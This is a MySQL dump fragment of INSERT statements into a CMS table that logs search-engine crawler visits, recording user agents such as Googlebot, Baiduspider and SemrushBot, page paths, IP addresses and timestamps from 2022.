INSERT INTO `ey_weapp_spider_visit` VALUES ('96621', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/112.html', '220.181.108.149', '1661392507', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96622', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '121.10.143.23', '1661392662', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96657', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/497.html', '185.191.171.18', '1661409537', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('96668', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/58.html', '116.179.32.164', '1661418687', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98391', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/368.html', '66.249.79.112', '1662181633', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98514', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.217.97', '1662201705', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98584', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/212.html', '157.55.39.117', '1662236747', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98588', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/294.html', '216.244.66.194', '1662238124', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98772', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_68/', '114.119.151.153', '1662339292', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94450', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/450.html', '114.119.151.153', '1660285698', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94453', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/', '157.55.39.41', '1660286253', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94455', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/318.html', '114.119.151.153', '1660286531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94456', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/cds.html', '114.119.151.153', '1660286623', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94457', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_37/', '114.119.151.153', '1660286953', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94458', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/18.html', '114.119.151.153', '1660287345', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94460', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_10/', '114.119.151.155', '1660287994', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94461', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljwd/', '114.119.151.153', '1660288134', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94462', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/223.html', '114.119.151.153', '1660288331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94513', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/72.html', '114.119.151.153', '1660319644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94514', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/77.html', '66.249.79.112', '1660319971', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94527', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/98.html', '185.191.171.7', '1660328868', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94536', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/234.html', '185.191.171.17', '1660335691', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94537', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/chezaibeng/', '216.244.66.194', '1660336644', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94546', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1660343638', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94547', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/135.html', '185.191.171.43', '1660343861', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94549', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/230.html', '116.179.32.103', '1660344759', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94552', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '116.179.32.105', '1660346814', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94571', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/83_2.html', '185.191.171.21', '1660355345', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94588', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/zanj.html', '114.119.151.153', '1660359112', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94590', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_49/', '185.191.171.19', '1660360300', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94591', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.110', '1660361009', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94592', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/16.html', '185.191.171.34', '1660361216', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94595', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.117', '1660365222', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94596', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_29/', '116.179.32.174', '1660365310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94598', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_19.html', '185.191.171.25', '1660365809', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94599', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/352.html', '207.46.13.59', '1660366508', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94602', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.112', '1660367754', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94603', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/40.html', '185.191.171.8', '1660368826', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94604', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/69.html', '185.191.171.38', '1660368918', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94621', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/162.html', '66.249.79.112', '1660382609', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94624', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_24', '114.119.151.155', '1660382897', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94627', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/148.html', '185.191.171.6', '1660385202', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94630', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/392.html', '185.191.171.14', '1660385914', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94634', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.108', '1660389818', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94636', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/61.html', '66.249.79.108', '1660391285', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94637', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '61.135.159.203', '1660391340', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94638', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/6_2.html', '185.191.171.16', '1660391551', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94639', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/203.html', '66.249.79.108', '1660391841', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94640', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/289.html', '185.191.171.11', '1660392071', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94642', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_5.html', '185.191.171.6', '1660394367', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94645', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/368.html?admin_id=1', '185.191.171.18', '1660397554', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94646', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/435.html', '66.249.79.112', '1660397696', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94647', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/290.html', '66.249.79.110', '1660397811', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94654', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/case/61.html', '66.249.79.110', '1660399905', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94655', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/chukouquanqiu/', '66.249.79.112', '1660400006', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94656', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/huz.html', '114.119.151.155', '1660400391', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94663', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '111.249.186.136', '1660401234', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94665', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/139.html', '66.249.79.108', '1660402422', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94667', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/products/75.html?admin_id=1', '185.191.171.1', '1660402663', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94669', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_56/', '185.191.171.38', '1660402980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94670', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_7/', '185.191.171.42', '1660403128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94678', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/112.html', '66.249.79.110', '1660405736', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94679', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/168.html', '185.191.171.34', '1660406197', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94682', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/160.html', '185.191.171.25', '1660407472', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94683', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/436.html', '185.191.171.14', '1660407927', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94689', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/5_2.html', '116.179.32.106', '1660414821', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94690', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/2_2.html', '185.191.171.9', '1660415461', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94693', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660417016', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94805', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/contact/', '185.191.171.42', '1660478317', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94808', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/1_5.html', '185.191.171.2', '1660479354', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94809', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_27/', '185.191.171.3', '1660479411', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94832', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/64.html', '114.119.151.155', '1660490325', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94836', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/products/', '207.46.13.59', '1660494065', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94837', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_6/', '185.191.171.17', '1660494928', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94838', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.112', '1660495305', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94841', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '59.58.228.37', '1660496958', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94843', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/297.html', '185.191.171.12', '1660498230', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94844', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_29/', '216.244.66.194', '1660498439', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94845', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/214.html', '66.249.79.110', '1660500528', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94846', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_43/', '185.191.171.25', '1660501633', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94849', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/174_2.html', '185.191.171.41', '1660502902', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94852', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/', '220.181.108.110', '1660504160', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94853', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/152.html', '185.191.171.14', '1660505261', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94869', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_20/', '185.191.171.4', '1660511898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94880', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/335.html', '114.119.151.155', '1660517237', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94881', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/107.html', '216.244.66.194', '1660518099', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94882', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sss.html', '114.119.151.155', '1660518518', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94883', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '123.125.109.40', '1660518945', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94884', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/355.html', '207.46.13.59', '1660519385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94885', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/197.html', '40.77.167.13', '1660520024', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94886', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/66.html', '185.191.171.24', '1660520531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94887', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_7.html', '185.191.171.10', '1660521063', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94889', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/226.html', '114.119.151.153', '1660522571', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94890', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/list_18_43/', '114.119.151.155', '1660522706', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94894', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.20.156', '1660529819', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94899', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/30.html', '185.191.171.2', '1660531407', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94900', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/176.html', '185.191.171.5', '1660532170', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94910', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/156.html', '185.191.171.44', '1660537328', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94911', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/cmq.html', '114.119.151.155', '1660537700', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94913', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/169.html', '185.191.171.5', '1660538148', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94914', '99', 'mozilla/5.0 (compatible; neevabot/1.0; +https://neeva.com/neevabot)', '/products/324.html', '100.26.127.17', '1660538482', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94915', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/jbJxw', '220.181.108.111', '1660538906', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94921', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/74.html', '114.119.151.155', '1660539268', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94968', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/list_3_55/', '216.244.66.194', '1660565417', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94969', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/case/list_4_2/', '216.244.66.194', '1660565473', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94972', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/16.html', '185.191.171.10', '1660566834', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94973', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.108', '1660568377', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94980', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/336.html', '52.53.129.247', '1660571297', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94994', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/315.html', '52.53.222.159', '1660571298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94998', '99', 'mozilla/5.0 (compatible; orbbot/1.1;)', '/products/', '52.53.232.21', '1660571298', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('94999', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/26.html', '185.191.171.44', '1660571712', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95000', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '113.195.121.236', '1660572319', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95009', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/198.html', '66.249.79.112', '1660579637', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95011', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/130.html', '114.119.151.155', '1660581301', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95012', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/195.html', '114.119.151.153', '1660581430', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95016', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/123.html', '220.181.108.175', '1660583127', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95032', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_18/', '185.191.171.15', '1660590851', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95078', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/55.html', '185.191.171.6', '1660612331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95079', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/99.html', '185.191.171.13', '1660612814', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95094', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_25/', '116.179.32.74', '1660620642', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95096', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljxw/list_18_39/', '185.191.171.2', '1660622268', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95097', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/141.html', '216.244.66.194', '1660622310', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('95148', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/products/13.html', '216.244.66.194', '1660644051', '0');
